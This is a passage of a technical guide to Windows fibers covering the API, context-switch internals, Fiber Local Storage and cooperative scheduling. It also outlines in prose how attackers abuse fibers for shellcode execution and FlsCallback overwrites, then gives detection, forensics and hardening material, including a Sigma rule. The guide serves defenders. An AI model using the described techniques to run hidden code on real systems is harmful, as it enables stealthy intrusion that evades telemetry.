    PVOID    FiberData;          // lpParameter passed at creation
    PVOID    ExceptionList;      // Top of SEH chain (NT_TIB.ExceptionList)
    PVOID    StackBase;          // High end of the fiber stack
    PVOID    StackLimit;         // Low end (guard page)
    PVOID    DeallocationStack;  // Original VirtualAlloc base
    CONTEXT  FiberContext;       // Saved CPU state: RIP, RSP, RBP, RBX, ...
    ULONG    FiberFlags;         // FIBER_FLAG_FLOAT_SWITCH, etc.
    PVOID    ActivationContext;  // Per-fiber activation context stack
    PVOID    FlsSlots;           // Per-fiber FLS slot array
} FIBER, *PFIBER;

You must never read or write this structure directly. The Win32 fiber functions manage its contents; treating the returned LPVOID as opaque is part of the contract.


4. The Core Fiber API

The full surface is small. The fiber-related declarations in winbase.h and fibersapi.h boil down to these functions:

Function | Purpose
ConvertThreadToFiber | Promote the calling thread into a fiber; required first
ConvertThreadToFiberEx | As above; accepts FIBER_FLAG_FLOAT_SWITCH
CreateFiber | Allocate stack + FIBER struct; record entry point and parameter
CreateFiberEx | As above; accepts dwStackCommitSize and flags
SwitchToFiber | Cooperative context switch to the supplied fiber
DeleteFiber | Free the fiber’s stack, context, and FIBER data
ConvertFiberToThread | Demote back to a plain thread; required to avoid leaks
GetCurrentFiber | Returns the current FIBER address (intrinsic, no CALL)
GetFiberData | Returns the lpParameter value (intrinsic, no CALL)

The exact CreateFiber signature, per MSDN:

LPVOID CreateFiber(
    SIZE_T                dwStackSize,    // initial commit size; 0 = executable's default
    LPFIBER_START_ROUTINE lpStartAddress, // VOID CALLBACK StartRoutine(LPVOID lpParameter)
    LPVOID                lpParameter     // passed to the fiber function
);

GetCurrentFiber and GetFiberData are compiler intrinsics on MSVC — they inline directly to a gs:[0x20]/fs:[0x10] read of NtTib.FiberData. They produce no import thunk and no CALL instruction, which has direct consequences for IAT-based detection.


5. Fiber Lifecycle: A Minimal Example

This walks the canonical create → switch → yield → delete sequence. Note how g_mainFiber is the fiber identity of the original thread, returned by ConvertThreadToFiber.

#include <windows.h>
#include <stdio.h>

LPVOID g_mainFiber  = NULL;
LPVOID g_workFiber  = NULL;

VOID CALLBACK WorkerFiberProc(LPVOID lpParam) {
    printf("[worker] running on fiber %p, param=%p\n",
           GetCurrentFiber(), lpParam);

    // Cooperative yield — control returns to the main fiber.
    SwitchToFiber(g_mainFiber);

    printf("[worker] resumed; returning will ExitThread()\n");
    SwitchToFiber(g_mainFiber);   // never let the routine return
}

int main(void) {
    // Promote thread; TEB->HasFiberData becomes 1.
    g_mainFiber = ConvertThreadToFiber(NULL);

    // 64 KiB initial stack commit; entry = WorkerFiberProc; param = 0xDEADBEEF.
    g_workFiber = CreateFiber(0x10000, WorkerFiberProc, (LPVOID)0xDEADBEEF);

    SwitchToFiber(g_workFiber);   // first run of worker
    printf("[main] back from worker\n");
    SwitchToFiber(g_workFiber);   // resume worker

    DeleteFiber(g_workFiber);     // safe: not the running fiber
    ConvertFiberToThread();       // demote; release fiber bookkeeping
    return 0;
}

Forgetting ConvertFiberToThread leaks the main fiber’s FIBER allocation on the process heap. Forgetting to yield back before the worker returns terminates the host thread via ExitThread.


6. Context Switching Internals

SwitchToFiber is the heart of the API. Conceptually, it performs:

  1. Save the current CPU state (RBX, RBP, RDI, RSI, R12-R15, RSP, RIP on x64) into the current fiber’s FiberContext.
  2. Save the SEH chain head (NtTib.ExceptionList) and stack bounds (StackBase, StackLimit) into the current FIBER.
  3. If FIBER_FLAG_FLOAT_SWITCH is set, save the XMM/MMX/x87 state.
  4. Update NtTib.FiberData to point at the target FIBER.
  5. Restore the target fiber’s stack bounds, SEH chain, FLS pointer, and CPU registers.
  6. Return to the saved instruction pointer of the target — execution resumes there on the target’s stack.

Critically, this is a pure user-mode operation. No syscall, no int 2e, no ETW event from Microsoft-Windows-Kernel-Process. The host thread’s kernel-visible state (KTHREAD, ETHREAD) is unchanged; only RIP/RSP move from the kernel’s view.

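; Conceptual sketch of the SwitchToFiber x64 core (pseudo-assembly; offsets are symbolic)
mov     rax, gs:[0x20]          ; rax = current FIBER (NtTib.FiberData)
mov     [rax + FiberContextOff + Rsp], rsp
mov     [rax + FiberContextOff + Rip], <return addr>
mov     gs:[0x20], rcx          ; NtTib.FiberData = target (rcx = lpFiber)
; ... restore the target's non-volatile registers ...
mov     rsp, [rcx + FiberContextOff + Rsp]
jmp     qword [rcx + FiberContextOff + Rip]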

Flow diagram showing the six steps of SwitchToFiber: saving registers, saving SEH and stack bounds, updating NtTib.FiberData, restoring target registers, and jumping to the target fiber's saved RIP — all in user mode with no syscall
SwitchToFiber completes an entire stack-and-register swap inside KernelBase.dll without issuing a single syscall or generating a kernel ETW event.
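
The bookkeeping in the six steps can be modelled with a few lines of ordinary code. What follows is a toy model, not the real implementation: the `Fiber` and `Thread` classes and their fields are hypothetical stand-ins for the FIBER structure and the TEB, and "registers" is just a dictionary. It shows which state moves on a switch (saved context, current-fiber pointer, FLS) and which does not (TLS).

```python
from dataclasses import dataclass, field


@dataclass
class Fiber:
    name: str
    context: dict = field(default_factory=dict)  # saved registers (stand-in for FiberContext)
    fls: dict = field(default_factory=dict)      # per-fiber FLS slots


@dataclass
class Thread:
    current: Fiber                                # stand-in for NtTib.FiberData
    registers: dict = field(default_factory=dict) # live CPU state
    tls: dict = field(default_factory=dict)       # per-thread; never swapped

    @property
    def fls_data(self) -> dict:
        """Stand-in for TEB->FlsData: always the current fiber's slots."""
        return self.current.fls

    def switch_to_fiber(self, target: Fiber) -> None:
        self.current.context = dict(self.registers)  # steps 1-3: save outgoing state
        self.current = target                        # step 4: update the current-fiber pointer
        self.registers = dict(target.context)        # steps 5-6: restore and resume target
```

Nothing in `switch_to_fiber` touches `tls`, which is the toy-model equivalent of the TLS sharing problem that Fiber Local Storage exists to solve.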

7. Fiber Local Storage (FLS)

TLS is per-thread. During a fiber switch the TEB’s TLS array is not swapped, so two fibers sharing a thread share TLS — a classic source of corruption when porting thread-based libraries to fibers. FLS solves this: it is per-fiber, and SwitchToFiber updates TEB->FlsData to the incoming fiber’s slot array.

Function | Purpose
FlsAlloc(PFLS_CALLBACK_FUNCTION) | Allocate an FLS index; optional destructor callback
FlsSetValue(DWORD, PVOID) | Store a per-fiber value at the given index
FlsGetValue(DWORD) | Read the current fiber’s value at the given index
FlsFree(DWORD) | Release the index; callbacks fire for live fibers

The destructor callback pointers are kept process-wide in PEB->FlsCallback. They fire on fiber deletion and thread exit, and — as covered below — they are a known abuse target.

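#include <windows.h>
#include <stdio.h>

LPVOID g_mainFiber;
DWORD  g_flsIndex;

// FLS destructor: invoked with the slot value when a fiber holding a non-NULL
// value is deleted, when the thread exits, or when the index is freed.
VOID WINAPI OnFlsDestroy(PVOID p) {
    HeapFree(GetProcessHeap(), 0, p);
}

VOID CALLBACK FiberA(LPVOID unused) {
    char *buf = (char*)HeapAlloc(GetProcessHeap(), 0, 32);
    if (buf != NULL) {
        lstrcpyA(buf, "fiber-A-private");
        FlsSetValue(g_flsIndex, buf);      // stored in this fiber's slot only
    }
    SwitchToFiber(g_mainFiber);
    printf("[A] still mine: %s\n", (char*)FlsGetValue(g_flsIndex));
    SwitchToFiber(g_mainFiber);            // never return from a fiber routine
}

int wmain(void) {
    g_mainFiber = ConvertThreadToFiber(NULL);
    g_flsIndex  = FlsAlloc(OnFlsDestroy);
    // ... create FiberA, FiberB, switch between them ...
    // Each fiber sees its own FlsGetValue(g_flsIndex) result.
    return 0;
}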

Hierarchy diagram showing how PEB holds FlsCallback destructor pointers, TEB holds NtTib.FiberData pointing to the FIBER structure and FlsData pointing to the per-fiber FLS slot array, with the destructor relationship between PEB FlsCallback and the slot array
FLS slot arrays are swapped per-fiber on every SwitchToFiber call, while PEB→FlsCallback holds process-wide destructor pointers that fire on fiber deletion — a known adversarial overwrite target.
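
The integrity check implied by that overwrite risk is simple once the callback pointers and module ranges have been extracted by a debugger or memory-forensics tool. A minimal sketch follows, assuming both are already available as plain integers; the function name and the tuple layout are hypothetical.

```python
def suspicious_callbacks(callbacks, text_ranges):
    """Flag callback pointers that fall outside every known .text range.

    callbacks   -- iterable of pointer values (0 means an unused slot)
    text_ranges -- iterable of (module_name, start, end) with end exclusive
    Returns a list of (slot_index, pointer) pairs worth investigating.
    """
    ranges = list(text_ranges)
    flagged = []
    for index, pointer in enumerate(callbacks):
        if pointer == 0:
            continue  # unused slot
        if not any(start <= pointer < end for _, start, end in ranges):
            flagged.append((index, pointer))
    return flagged
```

A flagged pointer is a lead rather than a verdict: JIT engines and some packers legitimately register callbacks in dynamically generated code.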

8. Building a Round-Robin Cooperative Scheduler

Fibers shine when modeling cooperative pipelines: parsers, generators, state machines. A trivial scheduler is a dispatcher fiber that round-robins through worker fibers, each of which yields back via SwitchToFiber(g_mainFiber).

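#include <windows.h>
#include <stdio.h>

#define N 3
LPVOID g_workers[N];
LPVOID g_mainFiber;

VOID CALLBACK Worker(LPVOID id) {
    for (int i = 0; i < 4; ++i) {
        // Cast explicitly so %llu is also correct on 32-bit builds.
        printf("[worker %llu] step %d\n", (unsigned long long)(ULONG_PTR)id, i);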
        SwitchToFiber(g_mainFiber);   // yield
    }
    // Final yield — never return from a fiber routine.
    SwitchToFiber(g_mainFiber);
}

int main(void) {
    g_mainFiber = ConvertThreadToFiber(NULL);
    for (ULONG_PTR i = 0; i < N; ++i)
        g_workers[i] = CreateFiber(0, Worker, (LPVOID)i);

    for (int round = 0; round < 4; ++round)
        for (int i = 0; i < N; ++i)
            SwitchToFiber(g_workers[i]);

    for (int i = 0; i < N; ++i) DeleteFiber(g_workers[i]);
    ConvertFiberToThread();
    return 0;
}

This is the same basic idea behind Microsoft SQL Server’s “lightweight pooling” (fiber mode) option: one OS thread, many SQL user contexts.


9. Legitimate Use Cases and Pitfalls

Use Case | Reason
Coroutines / generators | Native stack switching with no setjmp tricks
Porting cooperative legacy code | UNIX swapcontext-style schedulers map cleanly
Database engines | SQL Server fiber mode for high-concurrency workloads
Game engines / scripting hosts | Per-script execution context with explicit yield

Pitfalls are sharp:

  • COM apartments have thread affinity, not fiber affinity. Initializing COM on a fiber and later running that fiber on a different thread breaks COM's apartment assumptions.
  • CRT and many MS libraries stash state in TLS. Switching fibers leaves that state behind, producing subtle corruption.
  • Critical sections record the thread as the owner — a different fiber on the same thread re-enters without blocking.
  • __try/__except relies on the per-fiber exception list and stack bounds; SwitchToFiber swaps both, but code that pivots stacks by hand must keep NtTib.StackBase/StackLimit consistent with the active stack or exception dispatch and unwinding will fail.

10. Common Attacker Techniques

Fibers are attractive to adversaries because the entire execution primitive lives in user mode — no NtCreateThread, no CreateRemoteThread, no kernel ETW event for the act of switching execution. The patterns below are documented in public threat-research literature; described conceptually here for detection engineers.

Technique | Description
In-process shellcode via SwitchToFiber | Allocate PAGE_EXECUTE_READWRITE memory, copy a payload, call ConvertThreadToFiber then CreateFiber with the payload as lpStartAddress, then SwitchToFiber; execution begins with no new thread
Fiber-based ROP staging | A fiber’s saved CONTEXT includes RIP and RSP; manipulating a FIBER struct’s context fields lets an attacker pivot the stack on SwitchToFiber
PEB->FlsCallback overwrite | Overwrite an entry in the process-wide FLS callback array; on the next FlsFree or fiber/thread teardown the attacker-controlled pointer is invoked with attacker-controlled data
TLS evasion via FLS | Hide per-task state in FLS slots that defensive tooling enumerating TLS will miss
API hiding via intrinsics | GetCurrentFiber/GetFiberData produce no IAT entry; static analysis missing gs:[0x20] reads will not see fiber-aware code

The base ATT&CK parent for fiber-based in-process execution is T1055 Process Injection; MITRE has not assigned a fiber-specific sub-technique, so the closest analogue is T1055.004 (APC), which shares the “queue execution to a thread’s user-mode context” model.


11. Defensive Strategies & Detection

There is no kernel event for SwitchToFiber. Detection must focus on the setup that precedes fiber-based execution (RWX allocation, suspicious entry points) and on memory forensics of fiber state at rest.

Sysmon coverage for the surrounding behavior:

Event ID | Signal
1 | Process Create: establish baseline lineage
8 | CreateRemoteThread: co-occurs with cross-process fiber staging
10 | ProcessAccess: reflective loaders reading remote memory before fiber dispatch
17/18 | Named-pipe create/connect: common multi-stage loader IPC
25 | ProcessTampering: image-region tampering in a fiber host

ETW providers worth subscribing:

  • Microsoft-Windows-Threat-Intelligence — flags VirtualAlloc/VirtualProtect with PAGE_EXECUTE_*, the precursor to fiber shellcode staging.
  • Microsoft-Windows-Kernel-Process — does not see fiber switches but covers process/thread lifecycle.
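  • User-mode hooks on NtAllocateVirtualMemory + NtProtectVirtualMemory are not an ETW provider, but they add in-process context before execution; direct syscalls bypass them, so treat them as a complement to the Threat-Intelligence provider rather than a replacement.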

Memory forensics indicators:

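  • Walk TEB.NtTib.FiberData on every thread. FiberData shares a union with NT_TIB.Version, so check HasFiberData before treating the value as a pointer. Threads with HasFiberData == 1 in processes that have no business using fibers are immediately interesting.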
  • Use Volatility malfind to surface private, executable, non-image-backed pages — the target of a fiber-staged payload.
  • Dump PEB->FlsCallback and verify every entry resolves to an expected module’s .text section.
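
The first indicator can be checked directly against raw TEB bytes pulled from a memory image. The sketch below rests on stated assumptions: the x64 offsets come from public ntdll symbol dumps for recent Windows 10 builds and must be confirmed with dt ntdll!_TEB on the target build, and `fiber_state` is a hypothetical helper name.

```python
import struct

# Assumed x64 offsets (verify per build with: dt ntdll!_TEB).
NT_TIB_FIBER_DATA = 0x20   # union { PVOID FiberData; ULONG Version; }
SAME_TEB_FLAGS = 0x17EE    # USHORT bitfield in _TEB
HAS_FIBER_DATA = 0x0004    # assumed position of the HasFiberData bit


def fiber_state(teb: bytes) -> dict:
    """Report whether a raw TEB snapshot belongs to a fiber-hosting thread."""
    (slot,) = struct.unpack_from("<Q", teb, NT_TIB_FIBER_DATA)
    (flags,) = struct.unpack_from("<H", teb, SAME_TEB_FLAGS)
    hosts_fibers = bool(flags & HAS_FIBER_DATA)
    # Only trust the slot as a FIBER pointer when the flag is set; otherwise
    # the union holds the NT_TIB version value instead.
    return {"hosts_fibers": hosts_fibers,
            "fiber_data": slot if hosts_fibers else None}
```

Running this over every thread in a process and listing the ones that report `hosts_fibers` gives a short candidate set for closer inspection of the FIBER context and FLS slots.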

Sigma sketch for the cross-process precursor to fiber-based payload staging:

title: Suspicious ProcessAccess Preceding User-Mode Fiber Execution
id: 8f5c1d6e-3c7b-4b1f-9e1e-7e3e6e2b0a1f
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 10
    GrantedAccess:
      - '0x1fffff'   # PROCESS_ALL_ACCESS
      - '0x1f0fff'   # PROCESS_ALL_ACCESS as defined before Windows Vista
    TargetImage|endswith:
      - '\explorer.exe'
      - '\svchost.exe'
  filter_legit:
    SourceImage|endswith:
      - '\MsMpEng.exe'
      - '\SenseIR.exe'
  condition: selection and not filter_legit
level: high
tags:
  - attack.t1055
  - attack.t1106

Hardening:

  • SetProcessMitigationPolicy with ProcessDynamicCodePolicy (Arbitrary Code Guard) blocks creation of new executable pages, defeating fiber shellcode staging.
  • Control Flow Guard restricts indirect-call targets, narrowing SwitchToFiber and FLS-callback abuse to valid entry points.
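  • HVCI / memory integrity, together with the vulnerable-driver blocklist, raises the cost of loading the vulnerable drivers an attacker would need to tamper with process memory from the kernel.
  • WDAC / AppLocker restrict which binaries and scripts may run at all, shrinking the set of loaders that can stage a fiber payload; pair them with the Arbitrary Code Guard setting for non-JIT processes to deny PAGE_EXECUTE_* allocations.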

Graph diagram mapping fiber abuse detection signals: RWX allocation feeding ETW Threat-Intelligence provider and Sysmon events, memory forensics walking PEB FlsCallback for non-text-section pointers, and ACG/CFG/HVCI as hardening mitigations
Because SwitchToFiber produces no kernel telemetry, defenders must pivot to pre-execution signals like RWX allocations, memory forensics on FiberData and FlsCallback, and ACG to deny executable page creation entirely.

12. Tools for Fiber Analysis

Tool | Description | Link
WinDbg | Dump TEB, walk NtTib.FiberData, inspect FIBER.FiberContext | microsoft.com
Process Hacker | Enumerate threads, inspect TEB, examine private RWX regions | processhacker.sf.io
Process Monitor | Capture process, thread, and image-load activity surrounding fiber dispatch (it does not record VirtualAlloc/VirtualProtect calls) | sysinternals.com
Volatility 3 | windows.malfind, TEB plugins, FLS callback inspection | volatilityfoundation.org
pykd / WinDbg JS | Scripted walks of FIBER chains across all threads | githomelab.ru/pykd
x64dbg | User-mode debugging of fiber-aware binaries; trace gs:[0x20] reads | x64dbg.com
Ghidra | Static analysis; recognize GetCurrentFiber intrinsic pattern | ghidra-sre.org
Sysmon | Surrounding telemetry (Events 1, 8, 10, 25) | sysinternals.com

A minimal WinDbg recipe to surface fiber-hosting threads in a captured process:

0:000> !teb
TEB at 000000abcd123000
    ...
    NtTib.FiberData:  0000020fabcde000
    ...
0:000> dt ntdll!_TEB @$teb HasFiberData
0:000> dq 0000020fabcde000 L40 ; $$ raw FIBER bytes (layout is version-dependent)

13. MITRE ATT&CK Mapping

Technique | MITRE ID | Detection
Process Injection | T1055 | Memory scan for private RWX regions; ETW TI on NtAllocateVirtualMemory
Process Injection: Asynchronous Procedure Call | T1055.004 | Closest published sub-technique to fiber-based in-process execution
Native API | T1106 | API-call auditing of CreateFiber/SwitchToFiber/FlsAlloc
Reflective Code Loading | T1620 | Image-load anomalies; fiber entry point in non-image-backed memory
Impair Defenses: Disable or Modify Tools | T1562.001 | ETW/AMSI hook integrity checks; user-mode hook auditing

MITRE ATT&CK does not currently list a “Fiber Injection” sub-technique (current as of v16.1). Vendor research treats fiber-based execution as a variant of T1055; map accordingly.


Summary

  • A fiber is a user-mode cooperative thread invisible to the kernel scheduler — SwitchToFiber performs a stack and register swap entirely in KernelBase.dll with no syscall.
  • The TEB exposes the fiber state via NtTib.FiberData, HasFiberData, and FlsData; the FIBER structure itself is undocumented and version-dependent.
  • TLS is per-thread and is not swapped on a fiber switch; FLS is per-fiber and is swapped, with destructor callbacks tracked in PEB->FlsCallback.
  • Adversaries abuse fibers for in-process shellcode execution, ROP staging via the saved CONTEXT, and code execution via PEB->FlsCallback overwrites — none of which trigger thread-creation telemetry.
  • Detect via pre-execution signals (ETW TI on RWX allocations, Sysmon Event IDs 8/10/25), memory forensics on private executable regions and FlsCallback integrity, and hardening with ACG, CFG, and HVCI.
